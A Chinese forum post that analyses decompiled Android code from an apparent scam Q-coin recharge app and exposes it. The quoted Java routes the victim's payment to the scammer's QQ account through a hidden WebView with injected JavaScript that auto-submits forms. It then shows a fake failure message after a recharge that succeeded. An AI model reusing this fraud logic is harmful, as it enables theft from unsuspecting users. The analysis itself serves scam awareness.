本帖最后由 Jermic 于 2014-4-6 13:17 编辑
今天刚看到的一个帖子http://www.52pojie.cn/thread-249298-1-1.html
没事干下来看看!
能看到关于这个充值骗子的信息也就是这个
[Java] 纯文本查看 复制代码 this.WebView2.loadUrl("http://pay.qq.com/h5/index.shtml?&sid=AWLeiSNwBVHIAQI5-48dzNhg&u=2969571156");
showDownloadDialog();
this.mDownloadDialog.dismiss();
this.WebView3 = ((WebView)findViewById(2131230753));
this.WebView3.getSettings().setDefaultTextEncodingName("utf-8");
this.WebView3.addJavascriptInterface(new WebAppInterface(this), "myInterfaceName");
this.WebView3.setVisibility(4);
this.WebView3.getSettings().setJavaScriptEnabled(true);
this.WebView3.setWebChromeClient(new WebChromeClient()
{
public void onProgressChanged(WebView paramAnonymousWebView, int paramAnonymousInt)
{
MainActivity.this.activity.setProgress(paramAnonymousInt * 100);
if (paramAnonymousInt == 100) {
MainActivity.this.activity.setTitle(2131034112);
}
}
});
LZ说找到了QQ号,其实这样就是需要一个QQ号,不需要什么密码 通过QQ他人支付的一个页面,让用户把自己要充值的QB充值到这个人的QQ号上面
[Java] 纯文本查看 复制代码 public void showToast(String paramString)
{
MainActivity.date = paramString.toString();
if (paramString.indexOf("充值成功") > -1)
{
WebView localWebView14 = (WebView)MainActivity.this.findViewById(2131230726);
Runnable local1 = new Runnable()
{
private void Success()
{
System.exit(0);
int i = 1 + Integer.parseInt(MainActivity.szhi);
int j = Integer.parseInt(MainActivity.sqty) + Integer.parseInt(MainActivity.ydkj);
MainActivity.this.WebView3.loadUrl("javascript:document.getElementById('h2').value= '" + i + "'");
MainActivity.this.WebView3.loadUrl("javascript:document.getElementById('h3').value='" + j + "'");
MainActivity.this.WebView3.loadUrl("javascript:document.getElementById('button').click()");
MainActivity.this.showDialog("系统检测到你非法充Q币\n系统将清空你非法所得!");
}
public void run()
{
MainActivity.this.handler.removeCallbacks(MainActivity.this.task);
MainActivity.this.handler2.removeCallbacks(MainActivity.this.task2);
System.exit(0);
Success();
}
};
localWebView14.post(local1);
}
if (paramString.indexOf("mysql") > -1)
{
WebView localWebView13 = (WebView)MainActivity.this.findViewById(2131230726);
Runnable local2 = new Runnable()
{
public void run()
{
Matcher localMatcher = Pattern.compile("(\\d+)#(\\d+):(\\d+):(.+?):").matcher(MainActivity.date);
if (localMatcher.find())
{
MainActivity.sqqh = localMatcher.group(1).toString().trim();
MainActivity.szhi = localMatcher.group(2).toString().trim();
MainActivity.sqty = localMatcher.group(3).toString().trim();
MainActivity.sdate = localMatcher.group(4).toString().trim();
if (MainActivity.sqqh.length() < 4) {
MainActivity.sqqh = null;
}
}
}
};
localWebView13.post(local2);
}
这个地方还有个提示,就是充值其实成功了,然后假冒提示充值失败,对于没有经验的用户来说,就可能再一次两次三次的尝试这个软件,作者就获取更多的QB
[Java] 纯文本查看 复制代码 if (paramString.indexOf("mbb") > -1)
{
WebView localWebView6 = (WebView)MainActivity.this.findViewById(2131230726);
Runnable local9 = new Runnable()
{
public void run()
{
MainActivity.this.pag1();
MainActivity.this.WebView1.loadUrl("file:///android_asset/pag1.html");
}
};
localWebView6.post(local9);
}
if (paramString.indexOf("qty") > -1)
{
WebView localWebView5 = (WebView)MainActivity.this.findViewById(2131230726);
Runnable local10 = new Runnable()
{
public void run()
{
Matcher localMatcher = Pattern.compile("(\\d+)").matcher(MainActivity.date);
if (localMatcher.find())
{
MainActivity.ydkj = localMatcher.group(1).toString().toString();
MainActivity.this.pag2(localMatcher.group(1).toString());
}
MainActivity.this.WebView1.loadUrl("file:///android_asset/pag2.html");
}
};
里面还有一些类似这中代码,不太清楚是干嘛的,感觉像是伪造充值页面什么的吧
没有安装尝试这个软件,只是大概的看了一下代码 然后猜想的,,如果有不对的欢迎大家指出并补充,新人求不喷!给点热心 还是不错的~
| 
发表于 2014-4-6 13:16
发表于 2014-4-6 18:42
